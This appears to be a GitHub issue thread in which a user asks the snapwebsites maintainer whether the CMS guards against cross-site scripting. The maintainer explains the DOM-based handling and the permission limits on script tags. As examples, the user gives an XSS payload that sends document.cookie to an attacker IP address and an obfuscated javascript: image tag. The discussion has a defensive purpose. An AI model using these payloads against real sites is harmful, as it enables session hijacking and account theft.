Open shujaatak opened 5 years ago
AlexisWilke
commented
5 years ago It depends what you mean by sanitization. We use XML to build the DOM, so it is clean in that sense at least. We try to xmllint all XML files at compile time. However, dynamic data (i.e. when you edit a page) would not be checked that way. It still needs to be valid XML at some point. We verify various things in such input to avoid potential problems (such as entity bombs).
shujaatak
commented
5 years ago I mean is there XSS guard built-in in snapwebsites? How snapwebsites removes any XSS threats from the dynamic data?
AlexisWilke
commented
5 years ago Dynamic data can only be HTML and images. XSS is created with JavaScript. I'm not going to say that it's 100% certain that there is no such vector, but I do not know of one and we have been paying attention to those things.
Of course, if your the administrator, you're more likely to be able to do such things. So protecting your administrator account is important.
shujaatak
commented
5 years ago Let's suppose a user writes the following code in an article/comment:
<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>
which essentially hijack session cookie.
Or
<IMG SRC=jAvascript:alert('test2')>
etc.
Now the question arise whether such XSS attacks can be avoided using snapwebsites?
AlexisWilke
commented
5 years ago The <script> tag is not allowed unless you have enough permissions to add it.
I'd have to test the image tag to make sure.
Note that the A part would not matter. We use a DOM and when you do a obj.attr(), the entity will be parsed as expected.
I wonder if snapwebsites has built-in html sanitization feature or how one can achieve this?